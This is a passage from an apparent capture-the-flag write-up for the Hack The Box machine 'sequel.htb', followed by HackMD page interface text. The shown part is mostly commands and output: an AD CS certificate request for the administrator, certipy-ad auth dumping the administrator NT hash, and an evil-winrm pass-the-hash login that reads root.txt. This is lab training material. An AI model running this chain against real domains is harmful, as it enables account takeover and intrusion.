'sequel.htb' at '10.10.11.51' [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.11.51[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.11.51[\pipe\cert] [*] Successfully requested certificate [*] Request ID is 11 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx' ``` ``` ──(root㉿lyquockhanh)-[~] └─# ntpdate 10.10.11.51 2025-06-04 23:34:06.426353 (-0400) -1252.248469 +/- 0.107174 10.10.11.51 s1 no-leap CLOCK: time stepped by -1252.248469 ┌──(root㉿lyquockhanh)-[~] └─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/4/2025 12:40 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 9ae6967f3c8d7de1703571cf8e57d09e ``` ![image](https://hackmd.io/_uploads/S1Bvpwvq-e.png) ![image](https://hackmd.io/_uploads/ByusRwP9Zl.png)

    Import from clipboard

    Paste your markdown or webpage here...

    Advanced permission required

    Your current role can only read. Ask the system administrator to acquire write and comment permission.

    This team is disabled

    Sorry, this team is disabled. You can't edit this note.

    This note is locked

    Sorry, only owner can edit this note.

    Reach the limit

    Sorry, you've reached the max length this note can be.
    Please reduce the content or divide it to more notes, thank you!

    Import from Gist

    Import from Snippet

    or

    Export to Snippet

    Are you sure?

    Do you really want to delete this note?
    All users will lose their connection.

    Create a note from template

    Create a note from template

    Oops...
    This template has been removed or transferred.
    Upgrade
    All
    • All
    • Team
    No template.

    Create a template

    Upgrade

    Delete template

    Do you really want to delete this template?
    Turn this template into a regular note and keep its content, versions, and comments.

    This page need refresh

    You have an incompatible client version.
    Refresh to update.
    New version available!
    See releases notes here
    Refresh to enjoy new features.
    Your user state has changed.
    Refresh to load new user state.

    Sign in

    Forgot password
    or
    Sign in via Google Sign in via Facebook Sign in via X(Twitter) Sign in via GitHub Sign in via Dropbox Sign in with Wallet
    Wallet ( )
    Connect another wallet

    New to HackMD? Sign up

    By signing in, you agree to our terms of service.

    Help

    • English
    • 中文
    • Français
    • Deutsch
    • 日本語
    • Español
    • Català
    • Ελληνικά
    • Português
    • italiano
    • Türkçe
    • Русский
    • Nederlands
    • hrvatski jezik
    • język polski
    • Українська
    • हिन्दी
    • svenska
    • Esperanto
    • dansk

    Documents

    Help & Tutorial

    How to use Book mode

    Slide Example

    API Docs

    Edit in VSCode

    Install browser extension

    Contacts

    Feedback

    Discord

    Send us email

    Resources

    Releases

    Pricing

    Blog

    Policy

    Terms

    Privacy

    Cheatsheet

    Syntax Example Reference
    # Header Header 基本排版
    - Unordered List
    • Unordered List
    1. Ordered List
    1. Ordered List
    - [ ] Todo List
    • Todo List
    > Blockquote
    Blockquote
    **Bold font** Bold font
    *Italics font* Italics font
    ~~Strikethrough~~ Strikethrough
    19^th^ 19th
    H~2~O H2O
    ++Inserted text++ Inserted text
    ==Marked text== Marked text
    [link text](https:// "title") Link
    ![image alt](https:// "title") Image
    `Code` Code 在筆記中貼入程式碼
    ```javascript
    var i = 0;
    ```    		 
    var i = 0;
    :smile: :smile: Emoji list
    {%youtube youtube_id %} Externals
    $L^aT_eX$ LaTeX
    :::info
    This is a alert area.
    :::

    This is a alert area.
    Versions and GitHub Sync
    Get Full History Access

    • Edit version name
    • Delete

    revision author avatar     named on  

    More Less

    Note content is identical to the latest version.
    Compare
      Choose a version
      No search result
      Version not found
    Sign in to link this note to GitHub
    Learn more
    This note is not linked with GitHub
     

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub
        • Please sign in to GitHub and install the HackMD app on your GitHub repo.
        • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
        Learn more  Sign in to GitHub

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions
        Include title and tags
        Available push count

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch
        Available push count

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully